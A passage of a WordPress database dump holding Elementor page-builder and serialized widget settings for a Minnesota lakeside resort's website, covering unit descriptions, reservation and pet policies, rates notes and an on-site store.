800c9\",\"_id\":\"93c74aa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38e4916\"}]},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"059aaf5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"494138e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c136dd1\"}]},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"6a3f9d8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bc9849a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4500032\"}]},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e51bd4d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aa61889\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"06c9f69\"}]},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015. This unit has 2 bedrooms. One bedroom has a queen bed with a sliding glass door to the lake.<br \\/>The second bedroom has two single beds. The bathroom has a large walk in shower. This unit also has a door off the kitchen to go out to the lake.<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a85728e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8d8736a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0567beb\"}]},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cdfea3f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5fc4265\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"39410d5\"}]},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2e0b5c9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5244ee8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"955d6bd\"}]},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bdf024f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f3002db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bff9ec\"}]},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1804,744,'_elementor_template_type','post'),(1805,744,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1822,43,'_elementor_data','[{\"id\":\"74711f2d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9f9cdef\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3281785\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"30a19b3\"}]},\"elements\":[{\"id\":\"5f29bf84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7f1543f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"66ca0a5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8669d73\"}]},\"elements\":[{\"id\":\"3f6cc34d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pl-43\\\" class=\\\"panel-layout\\\"><div id=\\\"pg-43-0\\\" class=\\\"panel-grid panel-no-style\\\" data-style=\\\"{\\\" data-ratio=\\\"1\\\" data-ratio-direction=\\\"right\\\"><div id=\\\"pgc-43-0-0\\\" class=\\\"panel-grid-cell\\\" data-weight=\\\"1\\\"><div id=\\\"panel-43-0-0-0\\\" class=\\\"so-panel widget widget_sow-editor panel-first-child\\\" data-index=\\\"0\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">Call us at 218-747-2959 for reservations\\u2028<p>A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.<br \\/>ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW<\\/p><p>Wireless Internet Available<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"1\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>[table id=1 \\/]<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-2\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>Suite #9 \\u2013 Cabins #13 &amp; #14 are no smoking and no pets<br \\/>Prices shown are for groups of 4 or less.\\u2028 All Daytime (Not Overnight) Guests $5.00 each \\u2028Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br \\/>All RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\\u2028PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\\u2028\\u00a0<\\/p><p><strong>CHECK IN TIME IS AFTER 3:00 PM\\u2028 NO EXCEPTIONS\\u2028. CHECK OUT TIME IS BEFORE 10:00 AM (Late checkouts will be charged if not prearranged)\\u00a0<\\/strong>\\u00a0<br \\/>We believe that Pets are part of the family so pets on a leash are welcome in all campsites ( 1 pet per campsite)\\u00a0 and some of the units ( 1 pet per unit where allowable). \\u2028PETS $8.00 per day<br \\/>Please do not bring firewood, if you live more than 50 miles from Ashby!<br \\/>MOTEL OPEN YEAR ROUND.\\u2028 CALL FOR WINTER RATES<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-3\\\" class=\\\"so-panel widget widget_sow-editor panel-last-child\\\" data-index=\\\"3\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">[table id=2 \\/]<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1823,746,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:897:\"<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.<br />\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM<br />\nWe believe that Pets are part of the family so pets on a leash are welcome in all campsites a day and some of the units PETS $8.00 per day<br />\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1544645389395\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1824,746,'_wp_page_template','default'),(1825,746,'_elementor_edit_mode','builder'),(1826,746,'_elementor_template_type','post'),(1827,746,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1828,746,'_elementor_data','[{\"id\":\"74711f2d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9f9cdef\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3281785\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"30a19b3\"}]},\"elements\":[{\"id\":\"5f29bf84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7f1543f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"66ca0a5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8669d73\"}]},\"elements\":[{\"id\":\"3f6cc34d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pl-43\\\" class=\\\"panel-layout\\\"><div id=\\\"pg-43-0\\\" class=\\\"panel-grid panel-no-style\\\" data-style=\\\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;,&quot;background_image_repeat&quot;:&quot;&quot;,&quot;no_margin&quot;:&quot;&quot;}\\\" data-ratio=\\\"1\\\" data-ratio-direction=\\\"right\\\"><div id=\\\"pgc-43-0-0\\\" class=\\\"panel-grid-cell\\\" data-weight=\\\"1\\\"><div id=\\\"panel-43-0-0-0\\\" class=\\\"so-panel widget widget_sow-editor panel-first-child\\\" data-index=\\\"0\\\" data-style=\\\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">Call us at 218-747-2959 for reservations\\u2028<p>\\u00a0<\\/p><p>A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.<br \\/>ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW<\\/p><p>Wireless Internet Available<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"1\\\" data-style=\\\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>[table id=1 \\/]<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-2\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\" data-style=\\\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>Suite #9 \\u2013 Cabins #13 &amp; #14 are no smoking and no pets<br \\/>Prices shown are for groups of 4 or less.\\u2028 All Daytime (Not Overnight) Guests $5.00 each \\u2028Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br \\/>All RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\\u2028PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\\u2028 CRIBS &amp; HIGHCHAIRS AVAILABLE.<br \\/><br \\/>CHECK IN TIME IS AFTER 3:00 PM\\u2028 NO EXCEPTIONS\\u2028. CHECK OUT TIME IS BEFORE 10:00 AM<br \\/>We believe that Pets are part of the family so pets on a leash are welcome in all campsites a day and some of the units. \\u2028PETS $8.00 per day<br \\/>Please do not bring firewood, if you live more than 50 miles from Ashby!<br \\/>MOTEL OPEN YEAR ROUND.\\u2028 CALL FOR WINTER RATES<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-3\\\" class=\\\"so-panel widget widget_sow-editor panel-last-child\\\" data-index=\\\"3\\\" data-style=\\\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">[table id=2 \\/]<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1830,43,'_elementor_version','2.5.15'),(1876,752,'vantage_panels_no_legacy','true'),(1877,752,'_edit_lock','1554819086:1'),(1878,752,'_edit_last','1'),(1879,752,'_wp_page_template','default'),(1880,753,'vantage_panels_no_legacy','true'),(1881,753,'vantage_metaslider_slider',''),(1882,753,'vantage_metaslider_slider_stretch','1'),(1883,753,'vantage_menu_icon',''),(1884,753,'siteorigin_page_settings','a:6:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1885,753,'_menu_item_type','post_type'),(1886,753,'_menu_item_menu_item_parent','41'),(1887,753,'_menu_item_object_id','752'),(1888,753,'_menu_item_object','page'),(1889,753,'_menu_item_target',''),(1890,753,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1891,753,'_menu_item_xfn',''),(1892,753,'_menu_item_url',''),(1893,752,'vantage_metaslider_slider',''),(1894,752,'vantage_metaslider_slider_stretch','1'),(1895,752,'vantage_menu_icon',''),(1896,752,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1897,752,'_yoast_wpseo_content_score','30'),(1898,752,'_elementor_edit_mode','builder'),(1899,752,'_elementor_template_type','post'),(1900,752,'_elementor_version','2.5.12'),(1901,752,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1902,752,'_elementor_data','[{\"id\":\"cfb3086\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9bb2395\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bfe9bed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7abb36f\"}]},\"elements\":[{\"id\":\"6ec3d7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.288,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"32b83ea\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ad57fa7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ed2d47a\"}]},\"elements\":[{\"id\":\"2800fb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3679.jpg\",\"id\":492}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4721f5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.712,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1b25439\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4336e00\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d677481\"}]},\"elements\":[{\"id\":\"25ce023\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Forget to pack something you need, just check our store...<\\/strong><\\/p><p><strong>We provide lots of vacation things you need from fishing tackle to food.<\\/strong><\\/p><p>Th<strong>ere are even great fishing stories being told most mornings over a cup of coffee or cappuccino.<\\/strong><\\/p><p><strong>Some of the items available at the store:<\\/strong><\\/p><p><strong><br \\/><\\/strong><strong>Ice,\\u00a0<\\/strong><strong>\\u00a0Bait,\\u00a0<\\/strong><strong>Clothing,\\u00a0<\\/strong><strong>Gas, Groceries, Ice Cream, Pop,\\u00a0Tackle, Toiletries, Water<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd89908\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1af9162\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8cd473f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"404d4cf\"}]},\"elements\":[{\"id\":\"5504f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.7,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa7c034\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50ec903\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"84fa976\"}]},\"elements\":[{\"id\":\"833009a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2771.jpg\",\"id\":460}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"305e6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.3,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4f47843\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"36f8b95\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fa2b549\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"073999b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b9f23b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fb295f3\"},{\"eae_animated_gradient_color\":\"#e57600\